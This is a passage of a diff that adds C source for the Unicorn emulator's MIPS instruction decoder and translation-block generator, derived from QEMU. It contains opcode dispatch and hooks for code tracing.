(unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, ctx->pc); + } + + op = MASK_OP_MAJOR(ctx->opcode); + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + imm = (int16_t)ctx->opcode; + switch (op) { + case OPC_SPECIAL: + decode_opc_special(env, ctx); + break; + case OPC_SPECIAL2: + decode_opc_special2_legacy(env, ctx); + break; + case OPC_SPECIAL3: + decode_opc_special3(env, ctx); + break; + case OPC_REGIMM: + op1 = MASK_REGIMM(ctx->opcode); + switch (op1) { + case OPC_BLTZL: /* REGIMM branches */ + case OPC_BGEZL: + case OPC_BLTZALL: + case OPC_BGEZALL: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_BLTZ: + case OPC_BGEZ: + gen_compute_branch(ctx, op1, 4, rs, -1, (uint32_t)imm << 2, 4); + break; + case OPC_BLTZAL: + case OPC_BGEZAL: + if (ctx->insn_flags & ISA_MIPS32R6) { + if (rs == 0) { + /* OPC_NAL, OPC_BAL */ + gen_compute_branch(ctx, op1, 4, 0, -1, (uint32_t)imm << 2, 4); + } else { + generate_exception(ctx, EXCP_RI); + } + } else { + gen_compute_branch(ctx, op1, 4, rs, -1, (uint32_t)imm << 2, 4); + } + break; + case OPC_TGEI: case OPC_TGEIU: case OPC_TLTI: case OPC_TLTIU: case OPC_TEQI: /* REGIMM traps */ + case OPC_TNEI: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_trap(ctx, op1, rs, -1, imm); + break; + case OPC_SYNCI: + check_insn(ctx, ISA_MIPS32R2); + /* Break the TB to be able to sync copied instructions + immediately */ + ctx->bstate = BS_STOP; + break; + case OPC_BPOSGE32: /* MIPS DSP branch */ +#if defined(TARGET_MIPS64) + case OPC_BPOSGE64: +#endif + check_dsp(ctx); + gen_compute_branch(ctx, op1, 4, -1, -2, (uint32_t)imm << 2, 4); + break; +#if defined(TARGET_MIPS64) + case OPC_DAHI: + check_insn(ctx, ISA_MIPS32R6); + check_mips_64(ctx); + if (rs != 0) { + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rs], *cpu_gpr[rs], (int64_t)imm << 32); + } + MIPS_DEBUG("dahi %s, %04x", regnames[rs], imm); + break; + case OPC_DATI: + check_insn(ctx, ISA_MIPS32R6); + check_mips_64(ctx); + if (rs != 0) { + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rs], *cpu_gpr[rs], (int64_t)imm << 48); + } + MIPS_DEBUG("dati %s, %04x", regnames[rs], imm); + break; +#endif + default: /* Invalid */ + MIPS_INVAL("regimm"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_CP0: + check_cp0_enabled(ctx); + op1 = MASK_CP0(ctx->opcode); + switch (op1) { + case OPC_MFC0: + case OPC_MTC0: + case OPC_MFTR: + case OPC_MTTR: +#if defined(TARGET_MIPS64) + case OPC_DMFC0: + case OPC_DMTC0: +#endif +#ifndef CONFIG_USER_ONLY + gen_cp0(env, ctx, op1, rt, rd); +#endif /* !CONFIG_USER_ONLY */ + break; + case OPC_C0_FIRST: case OPC_C0_LAST: +#ifndef CONFIG_USER_ONLY + gen_cp0(env, ctx, MASK_C0(ctx->opcode), rt, rd); +#endif /* !CONFIG_USER_ONLY */ + break; + case OPC_MFMC0: +#ifndef CONFIG_USER_ONLY + { + uint32_t op2; + TCGv t0 = tcg_temp_new(tcg_ctx); + + op2 = MASK_MFMC0(ctx->opcode); + switch (op2) { + case OPC_DMT: + check_insn(ctx, ASE_MT); + gen_helper_dmt(tcg_ctx, t0); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case OPC_EMT: + check_insn(ctx, ASE_MT); + gen_helper_emt(tcg_ctx, t0); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case OPC_DVPE: + check_insn(ctx, ASE_MT); + gen_helper_dvpe(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case OPC_EVPE: + check_insn(ctx, ASE_MT); + gen_helper_evpe(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case OPC_DI: + check_insn(ctx, ISA_MIPS32R2); + save_cpu_state(ctx, 1); + gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case OPC_EI: + check_insn(ctx, ISA_MIPS32R2); + save_cpu_state(ctx, 1); + gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + default: /* Invalid */ + MIPS_INVAL("mfmc0"); + generate_exception(ctx, EXCP_RI); + break; + } + tcg_temp_free(tcg_ctx, t0); + } +#endif /* !CONFIG_USER_ONLY */ + break; + case OPC_RDPGPR: + check_insn(ctx, ISA_MIPS32R2); + gen_load_srsgpr(ctx, rt, rd); + break; + case OPC_WRPGPR: + check_insn(ctx, ISA_MIPS32R2); + gen_store_srsgpr(ctx, rt, rd); + break; + default: + MIPS_INVAL("cp0"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC, OPC_ADDI */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_BOVC, OPC_BEQZALC, OPC_BEQC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + /* OPC_ADDI */ + /* Arithmetic with immediate opcode */ + gen_arith_imm(ctx, op, rt, rs, imm); + } + break; + case OPC_ADDIU: + gen_arith_imm(ctx, op, rt, rs, imm); + break; + case OPC_SLTI: /* Set on less than with immediate opcode */ + case OPC_SLTIU: + gen_slt_imm(ctx, op, rt, rs, imm); + break; + case OPC_ANDI: /* Arithmetic with immediate opcode */ + case OPC_LUI: /* OPC_AUI */ + case OPC_ORI: + case OPC_XORI: + gen_logic_imm(ctx, op, rt, rs, imm); + break; + case OPC_J: case OPC_JAL: /* Jump */ + offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; + gen_compute_branch(ctx, op, 4, rs, rt, offset, 4); + break; + /* Branch */ + case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC, OPC_BLEZL */ + if (ctx->insn_flags & ISA_MIPS32R6) { + if (rt == 0) { + generate_exception(ctx, EXCP_RI); + break; + } + /* OPC_BLEZC, OPC_BGEZC, OPC_BGEC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + /* OPC_BLEZL */ + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + } + break; + case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC, OPC_BGTZL */ + if (ctx->insn_flags & ISA_MIPS32R6) { + if (rt == 0) { + generate_exception(ctx, EXCP_RI); + break; + } + /* OPC_BGTZC, OPC_BLTZC, OPC_BLTC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + /* OPC_BGTZL */ + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + } + break; + case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC, OPC_BLEZ */ + if (rt == 0) { + /* OPC_BLEZ */ + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + } else { + check_insn(ctx, ISA_MIPS32R6); + /* OPC_BLEZALC, OPC_BGEZALC, OPC_BGEUC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } + break; + case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC, OPC_BGTZ */ + if (rt == 0) { + /* OPC_BGTZ */ + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + } else { + check_insn(ctx, ISA_MIPS32R6); + /* OPC_BGTZALC, OPC_BLTZALC, OPC_BLTUC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } + break; + case OPC_BEQL: + case OPC_BNEL: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_BEQ: + case OPC_BNE: + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + break; + case OPC_LWL: /* Load and stores */ + case OPC_LWR: + case OPC_LL: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_LB: case OPC_LH: + case OPC_LW: case OPC_LBU: case OPC_LHU: + gen_ld(ctx, op, rt, rs, imm); + break; + case OPC_SWL: + case OPC_SWR: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_SB: case OPC_SH: + case OPC_SW: + gen_st(ctx, op, rt, rs, imm); + break; + case OPC_SC: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_st_cond(ctx, op, rt, rs, imm); + break; + case OPC_CACHE: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_cp0_enabled(ctx); + check_insn(ctx, ISA_MIPS3 | ISA_MIPS32); + /* Treat as NOP. */ + break; + case OPC_PREF: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); + /* Treat as NOP. */ + break; + + /* Floating point (COP1). */ + case OPC_LWC1: + case OPC_LDC1: + case OPC_SWC1: + case OPC_SDC1: + gen_cop1_ldst(ctx, op, rt, rs, imm); + break; + + case OPC_CP1: + op1 = MASK_CP1(ctx->opcode); + + switch (op1) { + case OPC_MFHC1: + case OPC_MTHC1: + check_cp1_enabled(ctx); + check_insn(ctx, ISA_MIPS32R2); + case OPC_MFC1: + case OPC_CFC1: + case OPC_MTC1: + case OPC_CTC1: + check_cp1_enabled(ctx); + gen_cp1(ctx, op1, rt, rd); + break; +#if defined(TARGET_MIPS64) + case OPC_DMFC1: + case OPC_DMTC1: + check_cp1_enabled(ctx); + check_insn(ctx, ISA_MIPS3); + gen_cp1(ctx, op1, rt, rd); + break; +#endif + case OPC_BC1EQZ: /* OPC_BC1ANY2 */ + check_cp1_enabled(ctx); + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_BC1EQZ */ + gen_compute_branch1_r6(ctx, MASK_CP1(ctx->opcode), + rt, ((uint16_t)imm) << 2); + } else { + /* OPC_BC1ANY2 */ + check_cop1x(ctx); + check_insn(ctx, ASE_MIPS3D); + gen_compute_branch1(ctx, MASK_BC1(ctx->opcode), + (rt >> 2) & 0x7, ((uint32_t)imm) << 2); + } + break; + case OPC_BC1NEZ: + check_cp1_enabled(ctx); + check_insn(ctx, ISA_MIPS32R6); + gen_compute_branch1_r6(ctx, MASK_CP1(ctx->opcode), + rt, ((uint16_t)imm) << 2); + break; + case OPC_BC1ANY4: + check_cp1_enabled(ctx); + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_cop1x(ctx); + check_insn(ctx, ASE_MIPS3D); + /* fall through */ + case OPC_BC1: + check_cp1_enabled(ctx); + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_compute_branch1(ctx, MASK_BC1(ctx->opcode), + (rt >> 2) & 0x7, (uint32_t)imm << 2); + break; + case OPC_PS_FMT: + check_cp1_enabled(ctx); + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_S_FMT: + case OPC_D_FMT: + check_cp1_enabled(ctx); + gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, + (imm >> 8) & 0x7); + break; + case OPC_W_FMT: + case OPC_L_FMT: + { + int r6_op = ctx->opcode & FOP(0x3f, 0x1f); + check_cp1_enabled(ctx); + if (ctx->insn_flags & ISA_MIPS32R6) { + switch (r6_op) { + case R6_OPC_CMP_AF_S: + case R6_OPC_CMP_UN_S: + case R6_OPC_CMP_EQ_S: + case R6_OPC_CMP_UEQ_S: + case R6_OPC_CMP_LT_S: + case R6_OPC_CMP_ULT_S: + case R6_OPC_CMP_LE_S: + case R6_OPC_CMP_ULE_S: + case R6_OPC_CMP_SAF_S: + case R6_OPC_CMP_SUN_S: + case R6_OPC_CMP_SEQ_S: + case R6_OPC_CMP_SEUQ_S: + case R6_OPC_CMP_SLT_S: + case R6_OPC_CMP_SULT_S: + case R6_OPC_CMP_SLE_S: + case R6_OPC_CMP_SULE_S: + case R6_OPC_CMP_OR_S: + case R6_OPC_CMP_UNE_S: + case R6_OPC_CMP_NE_S: + case R6_OPC_CMP_SOR_S: + case R6_OPC_CMP_SUNE_S: + case R6_OPC_CMP_SNE_S: + gen_r6_cmp_s(ctx, ctx->opcode & 0x1f, rt, rd, sa); + break; + case R6_OPC_CMP_AF_D: + case R6_OPC_CMP_UN_D: + case R6_OPC_CMP_EQ_D: + case R6_OPC_CMP_UEQ_D: + case R6_OPC_CMP_LT_D: + case R6_OPC_CMP_ULT_D: + case R6_OPC_CMP_LE_D: + case R6_OPC_CMP_ULE_D: + case R6_OPC_CMP_SAF_D: + case R6_OPC_CMP_SUN_D: + case R6_OPC_CMP_SEQ_D: + case R6_OPC_CMP_SEUQ_D: + case R6_OPC_CMP_SLT_D: + case R6_OPC_CMP_SULT_D: + case R6_OPC_CMP_SLE_D: + case R6_OPC_CMP_SULE_D: + case R6_OPC_CMP_OR_D: + case R6_OPC_CMP_UNE_D: + case R6_OPC_CMP_NE_D: + case R6_OPC_CMP_SOR_D: + case R6_OPC_CMP_SUNE_D: + case R6_OPC_CMP_SNE_D: + gen_r6_cmp_d(ctx, ctx->opcode & 0x1f, rt, rd, sa); + break; + default: + gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, + (imm >> 8) & 0x7); + break; + } + } else { + gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, + (imm >> 8) & 0x7); + } + break; + } + case OPC_BZ_V: + case OPC_BNZ_V: + case OPC_BZ_B: + case OPC_BZ_H: + case OPC_BZ_W: + case OPC_BZ_D: + case OPC_BNZ_B: + case OPC_BNZ_H: + case OPC_BNZ_W: + case OPC_BNZ_D: + check_insn(ctx, ASE_MSA); + gen_msa_branch(env, ctx, op1); + break; + default: + MIPS_INVAL("cp1"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + + /* Compact branches [R6] and COP2 [non-R6] */ + case OPC_BC: /* OPC_LWC2 */ + case OPC_BALC: /* OPC_SWC2 */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_BC, OPC_BALC */ + gen_compute_compact_branch(ctx, op, 0, 0, + sextract32(ctx->opcode << 2, 0, 28)); + } else { + /* OPC_LWC2, OPC_SWC2 */ + /* COP2: Not implemented. */ + generate_exception_err(ctx, EXCP_CpU, 2); + } + break; + case OPC_BEQZC: /* OPC_JIC, OPC_LDC2 */ + case OPC_BNEZC: /* OPC_JIALC, OPC_SDC2 */ + if (ctx->insn_flags & ISA_MIPS32R6) { + if (rs != 0) { + /* OPC_BEQZC, OPC_BNEZC */ + gen_compute_compact_branch(ctx, op, rs, 0, + sextract32(ctx->opcode << 2, 0, 23)); + } else { + /* OPC_JIC, OPC_JIALC */ + gen_compute_compact_branch(ctx, op, 0, rt, imm); + } + } else { + /* OPC_LWC2, OPC_SWC2 */ + /* COP2: Not implemented. */ + generate_exception_err(ctx, EXCP_CpU, 2); + } + break; + case OPC_CP2: + check_insn(ctx, INSN_LOONGSON2F); + /* Note that these instructions use different fields. */ + gen_loongson_multimedia(ctx, sa, rd, rt); + break; + + case OPC_CP3: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { + check_cp1_enabled(ctx); + op1 = MASK_CP3(ctx->opcode); + switch (op1) { + case OPC_LWXC1: + case OPC_LDXC1: + case OPC_LUXC1: + case OPC_SWXC1: + case OPC_SDXC1: + case OPC_SUXC1: + gen_flt3_ldst(ctx, op1, sa, rd, rs, rt); + break; + case OPC_PREFX: + /* Treat as NOP. */ + break; + case OPC_ALNV_PS: + case OPC_MADD_S: + case OPC_MADD_D: + case OPC_MADD_PS: + case OPC_MSUB_S: + case OPC_MSUB_D: + case OPC_MSUB_PS: + case OPC_NMADD_S: + case OPC_NMADD_D: + case OPC_NMADD_PS: + case OPC_NMSUB_S: + case OPC_NMSUB_D: + case OPC_NMSUB_PS: + gen_flt3_arith(ctx, op1, sa, rs, rd, rt); + break; + default: + MIPS_INVAL("cp3"); + generate_exception (ctx, EXCP_RI); + break; + } + } else { + generate_exception_err(ctx, EXCP_CpU, 1); + } + break; + +#if defined(TARGET_MIPS64) + /* MIPS64 opcodes */ + case OPC_LDL: case OPC_LDR: + case OPC_LLD: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_LWU: + case OPC_LD: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_ld(ctx, op, rt, rs, imm); + break; + case OPC_SDL: case OPC_SDR: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_SD: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_st(ctx, op, rt, rs, imm); + break; + case OPC_SCD: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_st_cond(ctx, op, rt, rs, imm); + break; + case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC, OPC_DADDI */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_BNVC, OPC_BNEZALC, OPC_BNEC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + /* OPC_DADDI */ + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_arith_imm(ctx, op, rt, rs, imm); + } + break; + case OPC_DADDIU: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_arith_imm(ctx, op, rt, rs, imm); + break; +#else + case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ + if (ctx->insn_flags & ISA_MIPS32R6) { + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + MIPS_INVAL("major opcode"); + generate_exception(ctx, EXCP_RI); + } + break; +#endif + case OPC_DAUI: /* OPC_JALX */ + if (ctx->insn_flags & ISA_MIPS32R6) { +#if defined(TARGET_MIPS64) + /* OPC_DAUI */ + check_mips_64(ctx); + if (rt != 0) { + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rt], t0, (uint32_t)imm << 16); + tcg_temp_free(tcg_ctx, t0); + } + MIPS_DEBUG("daui %s, %s, %04x", regnames[rt], regnames[rs], imm); +#else + generate_exception(ctx, EXCP_RI); + MIPS_INVAL("major opcode"); +#endif + } else { + /* OPC_JALX */ + check_insn(ctx, ASE_MIPS16 | ASE_MICROMIPS); + offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; + gen_compute_branch(ctx, op, 4, rs, rt, offset, 4); + } + break; + case OPC_MSA: /* OPC_MDMX */ + /* MDMX: Not implemented. */ + gen_msa(env, ctx); + break; + case OPC_PCREL: + check_insn(ctx, ISA_MIPS32R6); + gen_pcrel(ctx, rs, imm); + break; + default: /* Invalid */ + MIPS_INVAL("major opcode"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static inline void +gen_intermediate_code_internal(MIPSCPU *cpu, TranslationBlock *tb, + bool search_pc) +{ + CPUState *cs = CPU(cpu); + CPUMIPSState *env = &cpu->env; + DisasContext ctx; + target_ulong pc_start; + uint16_t *gen_opc_end; + CPUBreakpoint *bp; + int j, lj = -1; + int num_insns; + int max_insns; + int insn_bytes; + int is_slot = 0; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGArg *save_opparam_ptr = NULL; + bool block_full = false; + + if (search_pc) + qemu_log("search pc %d\n", search_pc); + + pc_start = tb->pc; + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + ctx.uc = env->uc; + ctx.pc = pc_start; + ctx.saved_pc = -1; + ctx.singlestep_enabled = cs->singlestep_enabled; + ctx.insn_flags = env->insn_flags; + ctx.CP0_Config1 = env->CP0_Config1; + ctx.tb = tb; + ctx.bstate = BS_NONE; + ctx.kscrexist = (env->CP0_Config4 >> CP0C4_KScrExist) & 0xff; + ctx.rxi = (env->CP0_Config3 >> CP0C3_RXI) & 1; + ctx.ie = (env->CP0_Config4 >> CP0C4_IE) & 3; + ctx.bi = (env->CP0_Config3 >> CP0C3_BI) & 1; + ctx.bp = (env->CP0_Config3 >> CP0C3_BP) & 1; + /* Restore delay slot state from the tb context. */ + ctx.hflags = (uint32_t)tb->flags; /* FIXME: maybe use 64 bits here? */ + ctx.ulri = env->CP0_Config3 & (1 << CP0C3_ULRI); + restore_cpu_state(env, &ctx); +#ifdef CONFIG_USER_ONLY + ctx.mem_idx = MIPS_HFLAG_UM; +#else + ctx.mem_idx = ctx.hflags & MIPS_HFLAG_KSU; +#endif + num_insns = 0; + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) + max_insns = CF_COUNT_MASK; + LOG_DISAS("\ntb %p idx %d hflags %04x\n", tb, ctx.mem_idx, ctx.hflags); + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + gen_tb_start(tcg_ctx); + gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); + ctx.bstate = BS_EXCP; + goto done_generating; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } else { + env->uc->size_arg = -1; + } + + gen_tb_start(tcg_ctx); + while (ctx.bstate == BS_NONE) { + // printf(">>> mips pc = %x\n", ctx.pc); + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == ctx.pc) { + save_cpu_state(&ctx, 1); + ctx.bstate = BS_BRANCH; + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_DEBUG); + /* Include the breakpoint location or the tb won't + * be flushed when it must be. */ + ctx.pc += 4; + goto done_generating; + } + } + } + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + tcg_ctx->gen_opc_pc[lj] = ctx.pc; + tcg_ctx->gen_opc_hflags[lj] = ctx.hflags & MIPS_HFLAG_BMASK; + tcg_ctx->gen_opc_btarget[lj] = ctx.btarget; + tcg_ctx->gen_opc_instr_start[lj] = 1; + tcg_ctx->gen_opc_icount[lj] = num_insns; + } + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) + // gen_io_start(); + + // Unicorn: end address tells us to stop emulation + if (ctx.pc == ctx.uc->addr_end) { + gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); + ctx.bstate = BS_EXCP; + break; + } else { + bool insn_need_patch = false; + int insn_patch_offset = 1; + + // Unicorn: save param buffer + if (HOOK_EXISTS(env->uc, UC_HOOK_CODE)) + save_opparam_ptr = tcg_ctx->gen_opparam_ptr; + + is_slot = ctx.hflags & MIPS_HFLAG_BMASK; + + if (!(ctx.hflags & MIPS_HFLAG_M16)) { + ctx.opcode = cpu_ldl_code(env, ctx.pc); + insn_bytes = 4; + decode_opc(env, &ctx, &insn_need_patch, &insn_patch_offset); + } else if (ctx.insn_flags & ASE_MICROMIPS) { + ctx.opcode = cpu_lduw_code(env, ctx.pc); + insn_bytes = decode_micromips_opc(env, &ctx, &insn_need_patch); + } else if (ctx.insn_flags & ASE_MIPS16) { + ctx.opcode = cpu_lduw_code(env, ctx.pc); + insn_bytes = decode_mips16_opc(env, &ctx, &insn_need_patch); + } else { + generate_exception(&ctx, EXCP_RI); + ctx.bstate = BS_STOP; + break; + } + + // Unicorn: patch the callback for the instruction size + if (insn_need_patch) { + /* + int i; + for (i = 0; i < 30; i++) + printf("[%u] = %x\n", i, *(save_opparam_ptr + i)); + printf("\n"); + */ + *(save_opparam_ptr + insn_patch_offset) = insn_bytes; + } + } + + if (ctx.hflags & MIPS_HFLAG_BMASK) { + if (!(ctx.hflags & (MIPS_HFLAG_BDS16 | MIPS_HFLAG_BDS32 | + MIPS_HFLAG_FBNSLOT))) { + /* force to generate branch as there is neither delay nor + forbidden slot */ + is_slot = 1; + } + } + + if (is_slot) { + gen_branch(&ctx, insn_bytes); + } + ctx.pc += insn_bytes; + + num_insns++; + + /* Execute a branch and its delay slot as a single instruction. + This is what GDB expects and is consistent with what the + hardware does (e.g. if a delay slot instruction faults, the + reported PC is the PC of the branch). */ + if (cs->singlestep_enabled && (ctx.hflags & MIPS_HFLAG_BMASK) == 0) { + break; + } + + if ((ctx.pc & (TARGET_PAGE_SIZE - 1)) == 0) + break; + + if (tcg_ctx->gen_opc_ptr >= gen_opc_end) { + break; + } + + if (num_insns >= max_insns) + break; + + //if (singlestep) + // break; + } + + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) { + block_full = true; + } + + //if (tb->cflags & CF_LAST_IO) { + // gen_io_end(); + //} + if (cs->singlestep_enabled && ctx.bstate != BS_BRANCH) { + save_cpu_state(&ctx, ctx.bstate != BS_EXCP); + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_DEBUG); + } else { + switch (ctx.bstate) { + case BS_STOP: + gen_goto_tb(&ctx, 0, ctx.pc); + env->uc->next_pc = ctx.pc; + break; + case BS_NONE: + save_cpu_state(&ctx, 0); + gen_goto_tb(&ctx, 0, ctx.pc); + break; + case BS_EXCP: + tcg_gen_exit_tb(tcg_ctx, 0); + break; + case BS_BRANCH: + default: + break; + } + } +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } else { + tb->size = ctx.pc - pc_start; + tb->icount = num_insns; + } + + env->uc->block_full = block_full; +} + +void gen_intermediate_code (CPUMIPSState *env, struct TranslationBlock *tb) +{ + gen_intermediate_code_internal(mips_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc (CPUMIPSState *env, struct TranslationBlock *tb) +{ + gen_intermediate_code_internal(mips_env_get_cpu(env), tb, true); +} + +#if 0 +static void fpu_dump_state(CPUMIPSState *env, FILE *f, fprintf_function fpu_fprintf, + int flags) +{ + int i; + int is_fpu64 = !!(env->hflags & MIPS_HFLAG_F64); + +#define printfpr(fp) \ + do { \ + if (is_fpu64) \ + fpu_fprintf(f, "w:%08x d:%016" PRIx64 \ + " fd:%13g fs:%13g psu: %13g\n", \ + (fp)->w[FP_ENDIAN_IDX], (fp)->d, \ + (double)(fp)->fd, \ + (double)(fp)->fs[FP_ENDIAN_IDX], \ + (double)(fp)->fs[!FP_ENDIAN_IDX]); \ + else { \ + fpr_t tmp; \ + tmp.w[FP_ENDIAN_IDX] = (fp)->w[FP_ENDIAN_IDX]; \ + tmp.w[!FP_ENDIAN_IDX] = ((fp) + 1)->w[FP_ENDIAN_IDX]; \ + fpu_fprintf(f, "w:%08x d:%016" PRIx64 \ + " fd:%13g fs:%13g psu:%13g\n", \ + tmp.w[FP_ENDIAN_IDX], tmp.d, \ + (double)tmp.fd, \ + (double)tmp.fs[FP_ENDIAN_IDX], \ + (double)tmp.fs[!FP_ENDIAN_IDX]); \ + } \ + } while(0) + + + fpu_fprintf(f, "CP1 FCR0 0x%08x FCR31 0x%08x SR.FR %d fp_status 0x%02x\n", + env->active_fpu.fcr0, env->active_fpu.fcr31, is_fpu64, + get_float_exception_flags(&env->active_fpu.fp_status)); + for (i = 0; i < 32; (is_fpu64) ? i++ : (i += 2)) { + fpu_fprintf(f, "%3s: ", fregnames[i]); + printfpr(&env->active_fpu.fpr[i]); + } + +#undef printfpr +} +#endif + +#if defined(TARGET_MIPS64) && defined(MIPS_DEBUG_SIGN_EXTENSIONS) +/* Debug help: The architecture requires 32bit code to maintain proper + sign-extended values on 64bit machines. */ + +#define SIGN_EXT_P(val) ((((val) & ~0x7fffffff) == 0) || (((val) & ~0x7fffffff) == ~0x7fffffff)) + +static void +cpu_mips_check_sign_extensions (CPUMIPSState *env, FILE *f, + fprintf_function cpu_fprintf, + int flags) +{ + int i; + + if (!SIGN_EXT_P(env->active_tc.PC)) + cpu_fprintf(f, "BROKEN: pc=0x" TARGET_FMT_lx "\n", env->active_tc.PC); + if (!SIGN_EXT_P(env->active_tc.HI[0])) + cpu_fprintf(f, "BROKEN: HI=0x" TARGET_FMT_lx "\n", env->active_tc.HI[0]); + if (!SIGN_EXT_P(env->active_tc.LO[0])) + cpu_fprintf(f, "BROKEN: LO=0x" TARGET_FMT_lx "\n", env->active_tc.LO[0]); + if (!SIGN_EXT_P(env->btarget)) + cpu_fprintf(f, "BROKEN: btarget=0x" TARGET_FMT_lx "\n", env->btarget); + + for (i = 0; i < 32; i++) { + if (!SIGN_EXT_P(env->active_tc.gpr[i])) + cpu_fprintf(f, "BROKEN: %s=0x" TARGET_FMT_lx "\n", regnames[i], env->active_tc.gpr[i]); + } + + if 